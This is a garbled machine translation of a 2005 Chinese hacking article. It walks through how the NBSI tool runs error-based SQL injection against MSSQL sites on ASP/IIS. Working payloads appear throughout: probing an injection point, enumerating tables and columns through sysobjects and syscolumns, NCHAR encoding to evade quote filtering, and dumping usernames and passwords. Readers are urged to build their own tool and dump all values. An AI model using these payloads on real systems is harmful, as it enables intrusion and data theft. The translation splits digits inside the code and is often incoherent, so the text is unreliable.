NBSI injection analysis of trace report the MSSQL article-the vulnerability warning-the black bar safety net

2005-12-28T00:00:00
ID MYHACK58:6220055876
Type myhack58
Reporter 佚名
Modified 2005-12-28T00:00:00

Description

Preface:

The preparation of a good tool is not easy, the preparation of an injection tool is not easy. This ArticleArticlesystem by tracking the NBSI of the injection process to analysis of cattle testing ideas. Rivals credits analysis of spying very helpful. Carefully track The NBSI of the Spy result is the injection attack one to enjoy.

First, we found an IT site do the test, the test directory is just to keep track of the NBSI of spying on ideas, not on the site for malicious destruction!

1 the injection point to the detection

Assuming that the injection point is: http://www.xxx.com/zhuru.asp?id=1

Then the NBSI will be the first probe such connection: http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(1 2 4)>0

The beginning don't understand why you want to call a Char(1 2 4),This value is actually a”|”symbol. Later we will say to.

Of course, this IIS error, returns a 5 0 0 of the internal error number, maybe the author is on this basis.

3 guess the table name

Track found, the author used a word to complete a table name guess solution, the efficiency is indeed very high. Specific table names to guess the code as:

And (Select Top 1 cast(name as varchar(8 0 0 0)) from(Select Top 1 id,name from sysobjects Where xtype=char(8 5) order by id) T order by id desc)>0

See the Red 1? This is guess data table the table name of the value! If it is the first table, of course it is 1, if it is the first table then the 1's to 2's, and so on.

So how do we decide the table name has been guessed is completed? This simple, tracking found that as long as the table name of the value X and X+1 table to return the table name value is the same as the representation of the guessing is completed.

5 guess the column name

Track found, the authors also use Word to complete a table name guess solution. May be this is for MSSQL guess the benefits of it! Exchange Access may also be a letter a letter to guess. Specific guess the column name The code is:

And (Select Top 1 cast(name as varchar(8 0 0 0)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(7 8)%2BNCHAR(1 0 1)%2BNCHAR(1 1 9)%2BNCHAR(1 1 5)%2BNCHAR(9 5)%2BNCHAR(8 5)%2BNCHAR(1 1 5)%2BNCHAR(1 0 1)%2BNCHAR(1 1 4)) Order by colid) T Order by colid desc)>0

See the Red 1? This indicates that we have to guess the column name of the sequence value. Into 2 It said to guess the first 2 column names. Determine the end of the way and determine the table name ends the same way.

Note:

NCHAR(7 8)%2BNCHAR(1 0 1)%2BNCHAR(1 1 9)%2BNCHAR(1 1 5)%2BNCHAR(9 5)%2BNCHAR(8 5)%2BNCHAR(1 1 5)%2BNCHAR(1 0 1)%2BNCHAR(1 1 4)

In order to bypass the ‘ sign restrictions, the authors try to use Nchar to connect the table name of the string value. Above this pass actually represents a table of string values. Parentheses inside of a digital is the character of the ASC code.

Example:

If we have to guess xfiletd the table name, as long as we use HUIE plug-in conversion click on OK!

See the following figure:

| !

We got the following characters:

nchar(7 8)%2bnchar(6 6)%2bnchar(6 9)%2bnchar(6C)%2bnchar(6 5)%2bnchar(7 4)%2bnchar(7 5)

Huh! Fast!

6 guess the solution data

Below we look at the NBSI is how to guess the solution data, according to the truth should be“storm”, let us look forward to what cows people is how to storm data.

1 Get field of record number

And%2 is 0(Select%20Cast(Count(1)%20as%20varchar(8 0 0 0))%2Bchar(9 7)%20From%2 0[News_Style]%20Where%2 0 1=1)>0

Wherein the Red News_Style on our behalf to guess the table name, here the author used a commonly used storm table skills. We get the number of fields after field is a INT type of value, his and 0 the comparison is not a type conversion error. In other words, the recording is not automatically the“strokes”. If we in the and 0 the comparison of time to achieve just put it and the Char(9 7)//The character a is connected, then we get will be a string. And zero comparison when you storm out of the“record number”+a such a value. Now we understand why the first step of spying want to add a”|”symbol. The mystery unraveled.

! Click to open in new window

2 get the value of the field

Get the number of records, and then continue the cycle and storms out of the field value. Okay, the author useless what peculiar tricks. The author of the code is:

And (Select Top 1 isNull(cast([sName] as varchar(8 0 0 0)),char(3 2))%2Bchar(1 2 4) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)>0

Red news_style I not much explained, is to guess the data table name, The Green of the 9 shows to get to the first on the sname field of the article 9 of the recorded value. Cycle a few times, huh! The data on the phone.

Everyone take note: char(1 2 4)this stuff. It also aims to put the data all converted to the string type and int type are compared, and then storm out of the data. Truth as said before it! This is NBSI why in the obtained fields inside a”|”so the value of reason. The author, perhaps too lazy to processing.: -)

! Click to open in new window

See? The back has a”|”symbol.

3 on the double data and N data guess

You may think, NBSI guess the data field value of the speed is very fast, track and analyze a bit, indeed good. Suppose we want to guess a table 2 field value. So how do we write code?

NBSI code is written this way:

The first step or with 1)the way to get the record number. The second step is to use:

And (Select Top 1 isNull(cast([UserName] as varchar(8 0 0 0)),char(3 2))%2Bchar(1 2 4)%2BisNull(cast([PassWord] as varchar(8 0 0 0)),char(3 2)) From (Select Top 1 UserName,PassWord From [News_User] Where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord, desc)>0

! Click to open in new window

(Note the|symbol separates the 2 numeric

News_user is a table name, Char(1 2 4)I will not explain. Everyone can Shine with the cat painting Tiger, put the above statement and 2 inside the statement for comparison. With the basic people on earth function of I think can be seen to the author is how the storm multi-field values. If you are happy, once the database values are storm out does not matter. Here indirect a reminder to everyone: the storm the value of a field of the network overhead and the storm all of the value of the network cost difference not much, the next time you play the NBSI time remember to put all values are hang on right now!

Summary: there is hope to complete their VB code The friend can, according to our analysis of the results write a program, you will also have your own NBSI in. Today's HUIE has such a feature.

After the sequence:

Write a program the most important thing isthe programmingidea, maybe you see just write a good part of the program details. We have boring, NBSI is how to judge the site whether injection? In fact, a single against the SQL storm wrong just an idea. NBSI to us to show the two ideas are:

2 Determine the IIS header to return to normal 2 0 0,1 0 1 is a basis, if the return 5 0 0 indicates that an error has occurred.

3 word for Word the judgment of the IIS return information, then compare whether there is a injection of possibilities! Because, some websites return HTML information amount is very large! App judgment is still very time consuming, not recommended

Something more, in fact we still need to learn. Not only is the storm the library, engage the injection